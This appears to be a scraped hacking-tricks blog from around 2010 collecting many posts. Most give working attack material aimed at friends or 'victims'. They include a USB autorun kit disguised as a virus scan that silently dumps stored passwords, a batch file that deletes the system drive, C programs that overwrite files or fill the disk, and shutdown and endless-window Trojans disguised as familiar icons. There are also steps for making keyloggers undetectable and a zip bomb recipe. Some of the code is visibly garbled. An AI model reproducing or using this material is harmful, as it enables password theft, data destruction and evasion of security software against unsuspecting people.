Dec 13, 2010

Hack Twitter With Twitter Bot

Twitter is becoming an important marketing tool for online publishers and marketers. But it can be time consuming to keep your profile up to date and it often gets forgotten. I guess Everybody is waiting for a Solution. So Today I will give you a software which will automate all your twitter tasks.
Twitter Bot can do a lot of amazing things without any need of User Intervention thats why it is called a Bot. Why one should have this software? I would say checkout the functions of this software and you will get your answer.

Features

1. Auto add followers: The twitter bot will add 500 new friends on a daily basis. Many of those follower may follow you in return.
2. Auto Unfollow those who are not following you: It will automatically unfollow those who are not following you.
3. Auto Follow those who follow you: You can return favor to your followers by following them and that by a click of a button
4. Follow Top 100 People from your Country: You can target users from a particular Country based on Time Zones
5. Auto Follow By Keyword Search: You can target user based on Specific Keywords.
6. Auto Update your status: You can update your status every X minutes and these Updates will be fetched from a Text File.
7. Auto reply: You can set a Message which will be replied automatically on arrival of a message.
8. Multiple accounts handling: You can handle multiple Accounts. Twitter Bot can handle all of them in the background doing all the functions.
9. Works with proxies or Real IP: The twitter bot can run behind proxies. You set a text file with a list of proxies in format IP:Port (ex. 123.123.123.123:80) and the twitter bot will first check to see which of them are working, and then it will use the working ones to login to your accounts and do the functions that you neet it to do.
10. Extract and import your followers: You can extract the list of followers into XML or Text file.
11. Schedule Messages: You can schedule the Bot to Update your Twitter status on a Specified Date and Time.
12. Reply based on Keywords: You can set the Bot to reply based on the Keyword found in arrived Message.

Conclusion

After mentioning all these features I don’t need to say much about this Software. I would say just go and grab this software.

Download

To get your copy of Twitter Bot Click Here

Labels: , , , , , , ,

Steal Your Friend's Password With USB Drive


As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.
 

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.
Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.
IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0
Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…
PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
Here is a step by step procedre to create the password hacking toolkit.
NOTE: You must temporarily disable your antivirus before following these steps.
1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.
2. Create a new Notepad and write the following text into it
[autorun]
open=launch.bat
ACTION= Perform a Virus Scan
save the Notepad and rename it from
New Text Document.txt to autorun.inf
Now copy theautorun.inf file onto your USB pendrive.
3. Create another Notepad and write the following text onto it.
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt
save the Notepad and rename it from
New Text Document.txt to launch.bat
Copy the launch.bat file also to your USB drive.
Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps
1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).
2. In the pop-up window, select the first option (Perform a Virus Scan).
3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.
4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.
This hack works on Windows 2000, XP,Vista and 7
NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

Labels: , , , , , ,

How To make An Autorun File For USB Drives


When you plug a  USB drive in, you might be interested in making a program, or other things happen as soon as you plug in. The way you accomplish this is through the Autorun.inf file. The autorun.inf file is located in the root of the usb drive and tells Windows what to do automatically.
This autorun can be used to make good, or bad USB’s depending on what you like.

This tutorial covers:


Creating a USB Autorun.inf
Changing label\icon of thumbdrive
Making a new option appear in the autorun menu
Making programs automatically run when plugged in

So Read On...



Creating a USB Autorun.inf :



To create an autorun file, open Notepad and save ‘autorun.inf’’ (with quotes) and save it to the root of the drive. All it needs to have is in the first line;


[autorun]

Done!

Changing label\icon of thumbdrive:

Follow the steps in Creating a USB Autorun.inf. Before you save it, type this in in this order!

[autorun]

icon=myicon.ico


label=MyLabel


And save. Make sure the icon file is in the root of your drive.

Making a new option appear in the autorun menu:

Right, so make your autorun file and type this into Notepad:


[autorun]
icon=default
label=[yourlabelhere]

action=programname.exe
Open Program



Save it and exit. Once again, the program has to be in the root. Now, when you plug it in, the option should appear in the menu.

Making programs automatically run when the USB is plugged in:

Follow the same instructions, blah blah blah;


[autorun]
Icon=default
label=YourLabelHere
open=programname.exe




And that’s it for this tutorial!
 
You can also follow these instructions when making a CD. You just have to burn it on the cd.
 
Any questions, please ask,a nd I’ll try to answer it as quickly as possible.

Labels: , , , ,

Remove Isass.exe Virus | Isass.exe removal-

Most people when they get this virus they may re-format their Computer due to frustration that it causes.
This virus allows you to have a few minutes on your Computer before it shuts it down.
To resolve this problem very quickly and easily, all you have to do is go to your clock and change the time back to a previous day.
This will extend the time you have with your computer depending on how long you change the time back.
With this extended time before your Computer shuts down it allows you to update your Anti-Virus software or go purchase a program.
If you are short of cash there is a free Anti-Virus program provided at http://www.grisoft.com/. The program is called AVG Anti-Virus.
Once you do all of the above its smooth sailing with your Computer and no more annoying shut downs.

Wen i go fr this trick, my Pc was reformated Bt after that I Came To Know About It.
Hopes, It work Well wid u Guys...
Best f Luck...

Labels: , , ,

Make Trojans And Keyloggers Undetectable-

First, get your trojan, virus or keylogger, or server or w/e you plan on using to become undetectable, and get it ready. Fix it up, create it, whatever.

My personal favorite
keylogger: Ardamax Keylogger

Now that you have your trojan, virus or keylogger or w/e harmful ready, its time to make it UNDETECED!

1. Download Software Passport (Armadillo) by Silicon Realms. This is THE best binder out there I know of, it makes everything %100 UNDETECTABLE BY ALL ANTIVIRUSES (including Norton, Kaspersky, Avast, etc)… The direct link to dl the program is here:
Code:
http://nct.digitalriver.com/fulfill/0161.001


There is a form to fill out information, so put in your real email address, and then you’ll recieve a download link in your email (it might be in Spam, Junk mail section so beware.)

2. Once you download the program, install it.
3. Once installed, you open it up and see this:
Code:
http://img339.imageshack.us/img339/6…assportzh3.jpg

This is the program. Now that you have it open, you might be confused on what to do, right? Well, this is what you do!

1. Download this pre-made settings. These settings are pre-made on the net so you won’t be confused. Everything is working.

DOWNLOAD THIS FOR THE PRE-MADE SETTINGS:
Code:
http://rapidshare.com/files/8749860/projects.arm.html

DOWNLOAD THIS FOR THE BACKUP (You need this in the same location as the projects.arm file) YOU NEED THIS FILE ALSO!
Code:
http://rapidshare.com/files/8750048/projects.Stats.html

Now, when you download these files, and you put them in the SAME FOLDER (or same location), open Software Passport again and click Load Existing Project (top left).

Where it says “Files to Protect” (if theres stuff there, delete it):
Add the files you want to make %100 UNDETECTABLE!!

Now, once done, go to the bottom right and click “Build Project”. A bunch of windows will come up, just click Yes and OK.

Now, once its created, they are %100 undetectable. Go to
Code:
virustotal.com
to scan it with every Antivirus, and they wont find ANYTHING!

„It takes a long time to learn simplicity.“

Labels: , , , , , ,

Make A Fake Virus In Windows

We Take no responsibility for any of this tricks , Do it at your own risk ;) . HaveFun

There are several kinds of fake virus messages you can make. I will discuss 4 of them:

1. Fake computer virus error message

This one is by far, the easiest and all you have to do is to make a new text document with notepad, type msg * YOUR MESSAGE and save as anything.bat. As always, make sure that you select All files instead of Text Document.

2. Forced shutdown trojan.
This will display a custom error message and start a countdown which will shut down the computer.


Right-click your desktop and create a new shortcut.
Paste the following code into the Location box in the Create Shortcut menu:
shutdown -s -t 30 -c “Your message here”
Replace 30 with the length of the countdown you want (in seconds) and place your custom error message between the quotes. Click next and name the shortcut to something the victim would be likely to click on such as “Internet explorer” or “My Documents”, etc.

Next you’d want to change the icon. Right-click on the shortcut you made and click properties. Find the Change Icon button and click it. Choose a suitable icon for the name you chose earlier.


And that’s all! Now you just have to sneak the shortcut onto the victim’s desktop and run!

Note: to stop it, open Run from the start menu and type shutdown-a.


3. Endless Command prompt windows trojan
This will open up a series of command prompt windows that will never end.
The basic idea is that there are two .bat files that open the other one when opened, so the other one opens the first one again and the windows just won’t stop coming.

How to do this:
1. Fire up notepad and type: start 2.bat
2. Save it as 1.bat (make sure you choose all files when saving it)
3. Make another new text document and type: start 1.bat
4. Save it as 2.bat into the same folder as the other one.

All you have to do to start it is to click on either of them.

The only way to stop it is to wait for the windows to become so numerous that they are a group on the taskbar. Then you can use Close group to get rid of the bastards.

4. Fake Command prompt trojan viruses
This is also a good way to make the victim believe that a worm is gnawing at their hard drive and that they can’t do anything to stop it.

Open up notepad and type @echo off

* To make text appear, type it after an echo tag.
* To have the the commands wait for the user to press any key type pause

(Note: if you write pause >nul it won’t display Press Any key to continue…)

* To have a complete high-speed description of files in the drive of the .bat file, type dir /s
* You can also initiate any other command we covered earlier, such as shutdown, error message, etc.

And why no include all of these in one fake virus?

For example:

I can’t post the batch files here, as sharing .bat files over the internet is illegal.
Make sure you don’t do anything stupid with these tips.

Labels: , , , , ,

Make A Simple Virus To Empty the C:

Hi!
This is a siple tricks for making your c: empty.
Please don run it on your own computer, it damn sure to work.
rather, if u wanna try it, try it on Virtual Computer, as i tried, and to my surprise , it worked as well.

copy the code, go to notepad, paste it, save it with .bat extension and you are done.
@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

Labels: , , ,

Virus Code In C - Learn Latest Computer And Mobile Hacking Tricks

Virus in c
#include
#include
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];int source,target,byt,done;struct ffblk ffblk;clrscr();textcolor(2);
cprintf("--------------------------------------------------------------------------");
printf("nVirus: Folderbomb 1.0n");
cprintf("--------------------------------------------------------------------------");
done = findfirst("*.*",&ffblk,0);
while (!done)
{
printf("n");
cprintf(" %s ", ffblk.ff_name);
printf("is attacked by ");
cprintf("Folderbomb");
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONLY);
while(1)
{
byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
elsebreak;
}
close(source);close(target);done = findnext(&ffblk);
}
getch();
}

Labels: , , ,

Create Your Zip Folder Of death-

1) Make a.txt file

2) Open and type the null character (alt + 255)

3) Press ctrl + a then ctrl + v a couple times to make some null bytes



4) If u have a hexeditor make the hex 00 for about 50 kilobytes.

5) Now make several copies of a.txt and name accordinly

6) Open cmd.exe

7) Type copy /b *.txt b.txt

8) Now every copy is made into a super copy and repeat

9) Once you have a nice empty big text file like 1gb. Put it in a zip archive.
Because of the simple construction of the file, 1gb of null bytes.....!

Labels: , , , , ,

Virus Code To Damage A HArd Disk - How To damage A Hard Disk

#include
#include
#include
#include
#include
#include
#include


#define HDSIZE 640000

void handle_sig();

int main() {

int i = 0;
int x;
int fd[5];

signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

char *buf;

buf = malloc(HDSIZE);

printf("sekt0r: trashing hard disk with bad sectors!\n");

while(1) {
fd[1] = open("/tmp/.test", O_WRONLY|O_CREAT, 511);
fd[2] = open("/tmp/.test1", O_WRONLY|O_CREAT, 511);
fd[3] = open("/tmp/.test2", O_WRONLY|O_CREAT, 511);
fd[4] = open("/tmp/.test3", O_WRONLY|O_CREAT, 511);
fd[5] = open("/tmp/.test4", O_WRONLY|O_CREAT, 511);

for(x = 0; x < 5; x++) {
write(fd[x], buf, HDSIZE);
lseek(fd[x], 0, SEEK_SET);
close(fd[x]);

} /* end for() loop. */
} /* end while() loop. */
} /* end main(). */


void handle_sig() {
/* Reset signal handlers. */
signal(SIGINT, handle_sig);
signal(SIGHUP, handle_sig);
signal(SIGQUIT, handle_sig);
signal(SIGABRT, handle_sig);
signal(SIGTERM, handle_sig);

printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");
return; /* go back to creating bad sectors. */
}

Labels: , , , , , ,

How To get Any Music video You Want - Learn Latest Computer And Mobile Hacking Tricks

Hi guys, Durin ma diiwali vacations, i Found out a really cool way to get cool music without p2p progs or HTTP/FTP sites.Best thing of all:NO QUEUES,NO PASSWORDS...
Here it is:
1.Get Yahoo Messenger [BETA] here:
CODE
http://download.yahoo.com/dl/installs/msgr6suite.exe


2.Wait for it to download,then run it and let it download another 5 MB or so.
3.Get FairStar MP3 Recorder here:
CODE
http://www.shareordie.com/forum/index.php?showtopic=9754

After testing Total Recorder and another prog,the FairStar product is the best RECORDING MP3s from a source,in our case the INTERNET RADIO.
4.Fire up LAUNCHcastRadion in Yahoo Messenger [BETA] and choose a station or a genre.
5.Start up FairStart MP3 Recorder,go to Record Options and CHECK autosetting,go to Encoder-MP3 and UN-CHECK enable VBR and choose 128 or 192 KBs.Also make sure you choose your OUTPUT folder and you're done.
6.Hit record or whatever and awaaaaaay you go.
More soon...

Labels: , , , ,

Autorun.inf File missing Or corrupt : How to recreate Autorun.inf file

Allowing autorun
Windows provide users with simple utility that runs automatically applications found on a CD, when inserted in the CD drive.
To make use of this option, you must verify that it is enabled under your system configuration. If it is the case, upon inserting a CD or DVD,Windows will try to open an application.This procedure is due to the "Autorun.inf" (primary instruction file associated with the Autorun utility) found at the root directory of the CD.
Creating an Autorun.inf file

First create a new (text-only)file a name it as autorun.inf.once created open it with your favourite text editor(notepad)and type in the following syntax:

[autorun]


parameter=value



Basically it should like that:

[autorun]


open=myapplication.exe


Variations

If the selected application is found in a sub folder, the path must be specified:

[autorun]


open=folderA\folderA1\myapplication.exe



If an argument is to be passed for the application to be auto played:

[autorun]


open=myapplication /argument


Customizing the icon

If you want to change the default icon add the following syntax:

icon=icon.ext



Example:

[autorun]


open=myapplication.exe


icon=myicon.jpg




The icon file should also reside in the root directory of the CD.


Customizing the icon text

Simply add the following command line:

label=My application


Customizing the icon menu

To edit the menu that appears when you right-click on the icon simply add the following syntax:

shell=start shell\start\command=path/myapplication.exe


shell\start=Run Application


shell\read\command=notepad++.exe files/readme.txt


shell\read=open readme.txt



Keep in mind that the following parameters shoul be defined: shell\*\command and shell\* ,as they are the keywords, firstly for defining the application to be executed and secondly, for the text displayed in the menu.

Labels: , , , , ,

Task Manager, Regedit and Folder Options Disabled by Virus ??

All must be aware of this problem caused by a virus called “Brontok”. Sometimes after removing the virus completely from our system, you’ll still face some problems such as you can no longer bring up Windows Task Manager from CTRL+ALT+DEL. You get the error message saying “Task Manager has been disabled by your administrator....









If You think that it’s easy to fix this problem by going to Registry Editor, you can’t! You'll get a error message “Registry editing has been disabled by your administrator”.









Folder Options and even Show Hidden Files & Folder is disabled! How frustrating! Don’t worry, here’s how to restore your Windows Task Manager, Registry Editor, Folder Options and Show hidden files & folders.

Brontok virus will make some changes to the system restrictions in order to hide itself from easy detection and also from easy cleaning.

Here’s a free tool called Remove Restrictions Tool (RRT) which is able to re-enables all what the virus had previously disabled, and gives you back the control over your own computer.


Remove Restrictions Tool is able to re-enable:
- Registry Tools (regedit)
- Ctrl+Alt+Del
- Folder Options
- Show Hidden Files

Small and easy to use. Make sure you boot in to Safe Mode to use Remove Restrictions Tool (RRT).

Labels: , , , , , ,

Virus Code For Disabling The Back Button



Virus Code For "A Disable the Back Button "  Hack

Name this first page default.asp

<%
Response.Expires = -1
Response.ExpiresAbsolute = Now() - 1
Response.AddHeader "pragma", "no-cache"
Response.AddHeader "cache-control", "private"
Response.CacheControl = "no-cache"

dim qString: qString = Session("qString") & "&back=y"
dim strHead: strHead = ""
dim strFoot: strFoot = ""

if Session("submitted") = "yes" then
response.write strHead
response.write ""
response.write strFoot
response.end
end if

response.write strHead
response.write "
"
response.write "type something in:
"
response.write "
"
response.write ""
response.write strFoot
%>
------------------------------------------------------------
Name this page page2.asp

<%
dim strHead: strHead = ""
dim strFoot: strFoot = ""

dim BackCheck: BackCheck = request("back")
dim strSomething: strSomething = request("something")

Session("qString") = request.QueryString
Session("submitted") = "yes"

response.write strHead
if BackCheck = "y" then
response.write "hey, you tried to go back!

"
end if
response.write "you wrote: " & strSomething
response.write strFoot
%>


Comments Would be Appreciated......

Go Home

Labels: , , , , ,

How To make A Trojan Horse VirusHow To make A Trojan Horse Virus


Most of you may be curious to know about how to make a Trojan or Virus on your own. Here is an answer for your curiosity. In this post I’ll show you how to make a simple Trojan on your own using C programming language.

This Trojan when executed will eat up the hard disk space on the root drive (The drive on which Windows is installed, usually C: Drive) of the computer on which it is run. Also this Trojan works pretty quickly and is capable of eating up approximately 1 GB of hard disk space for every minute it is run. So, I’ll call this as "C Drive Fucker". HAHA.

Before I move to explain the features of this Trojan you need to know what exactly is a Trojan horse and how it works.

The Trojan horse which I have made appears itself as an antivirus program that scans the computer and removes the threats. But in reality it does nothing but occupy the hard disk space on the root drive by just filling it up with a huge junk file. The rate at which it fills up the hard disk space it too high. As a result the the disk gets filled up to 100% with in minutes of running this Trojan. Once the disk space is full, the Trojan reports that the scan is complete. The victim will not be able to clean up the hard disk space using any cleanup program. This is because the Trojan intelligently creates a huge file in the Windows\System32 folder with the .dll extension. Since the junk file has the .dll extention it is often ignored by disk cleanup softwares. So for the victim, there is now way to recover the hard disk space unless reformatting his drive.
The algorithm of the Trojan is as follows
1. Search for the root drive
2. Navigate to WindowsSystem32 on the root drive
3. Create the file named “spceshot.dll
4. Start dumping the junk data onto the above file and keep increasing it’s size until the drive is full
5. Once the drive is full, stop the process.
You can download the Trojan source code HERE. Please note that I have not included the executabe for security reasons. You need to compile it to obtain the executable.

Learn How To Compile A Program In C.


Testing:
To test the Trojan,  just run the SpaceEater.exe file on your computer. It’ll generate a warning message at the beginning. Once you accept it, the Trojan runs and eats up hard disk space.

How to remove the Damage and free up the space?
To remove the damage and free up the space, just type the following in the “run” dialog box.
%systemroot%\system32
Now search for the file “spceshot.dll“. Just delete it and you’re done. No need to re-format the hard disk.

NOTE: You can also change the ICON of the virus to make it look like a legitimate program. This method is described in the post: How to Change the ICON of an EXE file ?

Labels: , , , , ,

Disable Yahoo Tracking- Learn Latest Computer And MObile hacking Tricks

Yahoo! has upgraded its features and the capacities of the mail accounts have grown to 2GB. But the "Tracking" methods have been renewed with this move also.
Yahoo! is now keeping track of which sites its members that are getting into groups or using Yahoo! services are visiting and storing this data with a method called "Web Beacons". The aim is to give these statistics to the partner companies arranged by agreement and to improve the "advertisement guiding" function.

However, those who are bothered by this and do not want to be kept track of have still a choice.
Yahoo! has hidden this option way deep inside somewhere but I'm declaring it here in case there are people who want it anyway:


1. Go to the address

CODEhttp://privacy.yahoo.com/privacy

and click the "Cookies" link under the "Special Topics" column.

2. Click the "Web Beacons" link under the "Reference Links" Column.

3. On this page, click the "click here to opt out" link toward the end of the third paragraph under the "Outside the Yahoo! Network" title.

4. After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual surfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!)

5. You're done! Now Yahoo! will not record what you're doing during surfing.
As you all know, Yahoo! upgraded its features and the capacities of the mail accounts have grown to 2GB. That's good for sure, but the "monitoring" methods that we all have been far too familiar with in the last couple of years have been renewed with this move also. Yahoo! is now keeping track of which sites its members that are getting into groups or using Yahoo! services are visiting and storing this data with a method called "Web Beacons". The aim is to give these statistics to the partner companies arranged by agreement and to improve the "advertisement guiding" function.

However, those who are bothered by this and do not want to be kept track of have still a choice. Yahoo! has hidden this option way deep inside somewhere but I'm declaring it here in case there are people who want it anyway:

1. Go to the address

CODEhttp://privacy.yahoo.com/privacy

and click the "Cookies" link under the "Special Topics" column.

2. Click the "Web Beacons" link under the "Reference Links" Column.

3. On this page, click the "click here to opt out" link toward the end of the third paragraph under the "Outside the Yahoo! Network" title.

4. After a while, a page that says you have been out of the monitoring program will load. Without doing anything, close that page or continue your usual surfing by typing another address in the address bar. (Do NOT click the "Cancel Opt-out" button, your action will be cancelled!)

5. You're done! Now Yahoo! will not record what you're doing during surfing.

Labels: , , , ,

Login With Multiple Logins in yahoo, orkut, gmail, msn, etc.: Learn Latest Computer And Mobile Hacking Tricks

Well this trick has done wonders for me, Hope it works for you to.

step 0 :
- Download Firefox for more efficiency(optional).

Step 1:
- Open system “properties”(by right clicking my computer).
- Choose tab “advanced”, click to “environment variables” button.
- In “system variables” section, click “new”.
- Type this information to each textbox.

Step 2:
variable name: moz_no_remote (should be all small letter).
variable value: 1

Step 3:
- Open firefox icon’s properties(from desktop and quick launch).
- Add extension -p to command line(like “c:\program files\mozilla firefox\firefox.exe” -p).
- Press ok.

When you will open firefox it will prompt for profile selection create a profile,open firefox login to orkut open once more use another profile login.

Labels: , , , , ,

How To Use Hidden Emotions In Yahoo: Learn Latest Computer And Mobile Hacking Tricks

Here Are some Of the emotion icons which are hidden in yahoo.
Grab them and enjoy..



More...





Labels: , , , , ,

Does The Yahoo Booter Works - Learn Latest Computer And Mobile Hacking Tricks

Yahoo messenger can get into yahoo chat, but in reality, it’s a seperate service…

Yahoo Messenger’s server has a Buffer, this buffer is actually 128k not the 512k.

When the attacker sends multiple packets to you, what you don’t get from the server gets stored in a buffer, in comes a chat packet, the client grabs it, in comes 5 chat packets, you grab the first 3 packets, 2 are left behind on yahoo’s server, you then grab the 2 packets and then the buffer is back to empty.


Actually the booter sends 1k’s worth in 1 packet of PM (instant messaging packets) but instead of sending the 1 packet, the booter builds up 10 pm/im packets.

Then you send it to yahoo 10 loops packets of PMs @ 1k each = 80k in 1 load to yahoo then the booter sends it again, 160k.

Now if you can send 128k’s worth of data, pm packets, chat packets, anything you like to the other user BEFORE the user can get the data out, yahoo will simply disconnect them over 128k why?

Most Probably because the server is instructed to disconnect idle users or users who are no longer online, what’s the point of Keeping someone in yahoo chat if they are not getting the data people are sending them, after 40 minutes of a client sending data yahoo goes, we’ve buffered 128k, the user aint there, kick him…!

In Short, Yahoo Messenger Would Crash if it got anything more than 128k.

Also the connection protocols YMSG and Chat2 which is also a factor. YChat was harder to boot for the simple fact that it lacked in features compared to YMSG.
This is also why YMSG is easier to boot then Chat2. The more features the more ways you can be booted.

Yes there are ways to prevent from being booted…..!

Labels: , , , ,

Reveal Passwords Behind *** Asterisks - Learn Latest Computer And Mobile Hackign Tricks

Want to Reveal the Passwords Hidden Behind Asterisk (****) ?

Follow the steps given below-

1) Open the Login Page of any website. (eg. http://mail.yahoo.com)

2) Type your 'Username' and 'Password'.

3) Copy and paste the JavaScript code given below into your browser's address bar and press 'Enter'.


javascript: alert(document.getElementById('Passwd').value);


4) As soon as you press 'Enter', A window pops up showing Password typed by you..!


Note :- This trick may not be working with firefox

Labels: , , , , , , ,

Fetch Password That Are Stored In Windows - Learn Latest Computer And Mobile Hakcing Tricks

Today I will show you how to hack Passwords using an USB Pen Drive. As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to hack passwords from your friend’s/college Computer. We need the following tools to create our rootkit.

MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.


Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 - v6.0

Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.

Here is a step by step procedre to create the password hacking toolkit.

NOTE: You must temporarily disable your antivirus before following these steps.

1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.

ie: Copy the files - mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

2. Create a new Notepad and write the following text into it

[autorun]
open=launch.bat
ACTION= Perform a Virus Scan

save the Notepad and rename it from

New Text Document.txt to autorun.inf

Now copy theautorun.inf file onto your USB pendrive.


3. Create another Notepad and write the following text onto it.

start mspass.exe /stext mspass.txt

start mailpv.exe /stext mailpv.txt

start iepv.exe /stext iepv.txt

start pspv.exe /stext pspv.txt

start passwordfox.exe /stext passwordfox.txt

save the Notepad and rename it from

New Text Document.txt to launch.bat

Copy the launch.bat file also to your USB drive.

Now your rootkit is ready and you are all set to hack the passwords. You can use this pendrive on your friend’s PC or on your college computer. Just follow these steps

1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

2. In the pop-up window, select the first option (Perform a Virus Scan).

3. Now all the password hacking tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

This hack works on Windows 2000, XP and Vista

Labels: , , , , , , ,

How to hack, Crack, Find Lost Messenger Passwords

crack IM passwordsMessenPass – Free Software to Hack, Crack or Find Lost Messenger Passwords

Despite the fact that the title of this post mentions about Breaking MSN Messenger Passwords, this utility can be used to find your forgotten passwords of any of the following IM clients.
  • MSN Messenger
  • Windows Messenger (In Windows XP)
  • Windows Live Messenger (In Windows XP And Vista)
  • Yahoo Messenger (Versions 5.x and 6.x)
  • Google Talk
  • ICQ Lite 4.x/5.x/2003
  • AOL Instant Messenger v4.6 or below, AIM 6.x, and AIM Pro.
  • Trillian
  • Trillian Astra
  • Miranda
  • GAIM/Pidgin
  • MySpace IM
  • PaltalkScene
  • Digsby
It is an impressive list and contains almost all of the popular IM Client applications.

How to Use MessenPass to View or Find Lost IM Passwords.

When you run MessenPass, it automatically detects the Instant Messenger applications installed on your computer, decrypts the passwords they store, and displays all user name/password pairs that it found in the main window of MessenPass. If from some reason, MessenPass fails to locate the installed Instant Messenger application, you can try to manually select the right folder of your IM application by using ‘Select Folders’ option (from the File menu).
On the main window of MessenPass, you can select one or more password items, and then copy them to the clipboard in tab-delimited format (you can paste this format into Excel or Open-Office Spreadsheet), or save them into text/html files.
crack IM passwords
MessenPass can be used without any installation process, simply by running the executable file (mspass.exe) from the zip file, which you will get when you download this application from the link given below.

Download It here

Labels: , , , , , ,

Yahoo Mail settings for Mobiles : Learn Latest Computer And Mobile Hacking Tricks

Steps to configure Yahoo mailbox on your mobile. Its very simple just 5 Minute to configure it. Learn with screen shot. This is tested on N73 and works perfectly.

For configuration

Go to tools--> Setting Wizard--> Email Setting-->


INCOMING E-MAIL

1. User name- (your user name)
2. Password- (your password)
3. Incoming mail server-pop.mail.yahoo.co.in (or what ever yours)
4. Access point-( your gprs access point)
5. Mail box name-yahoo
6. Mail box type- pop3
7. Security ports- off
8. Ports- default
9. APOP secure login-off

FOR OUTGOING E-MAIL

1. Email adress- (your email address)
2. User name- (your user name)
3. Password- (your password)
4. Out going mail server- smtp.mail.yahoo.co.in (or what ever yours)
5. Access point- (your access point)
6. Security ports-off
7. port-587

Thats all now go to automatic retrieval and change header retrieval to always for auto download

To see the screen shot :





Labels: , , ,

How to find the IP address of the email sender in Gmail, Yahoo! mail or Hotmail


When you receive an email, you receive more than just the message.
The email comes with headers that carry important information that can
tell where the email was sent from and possibly who sent it.
For that, you would need to find the IP address of the sender.

The tutorial below can help you find the IP address of the sender.
Note that this will not work if the sender uses anonymous proxy servers.


Finding IP address in Gmail
1. Log into your Gmail account with your username and password.
2. Open the mail.
3. To display the headers,
* Click on More options corresponding to that thread. You should get a bunch of links.
* Click on Show original

4. You should get headers like this:
Gmail headers : name
Look for Received: from followed by a few hostnames and an IP address between square brackets.
In this case, it is

65.119.112.245.

That is be the IP address of the sender!
5. Track the IP address of the sender.


Finding IP address in Yahoo! Mail

1. Log into your Yahoo! mail with your username and password.
2. Click on Inbox or whichever folder you have stored your mail.
3. Open the mail.
4. If you do not see the headers above the mail message, your headers are not displayed.
To display the headers,
* Click on Options on the top-right corner
* In the Mail Options page, click on General Preferences
* Scroll down to Messages where you have the Headers option
* Make sure that Show all headers on incoming messages is selected
* Click on the Save button
* Go back to the mails and open that mail

5. You should see similar headers like this:
Yahoo! headers : name
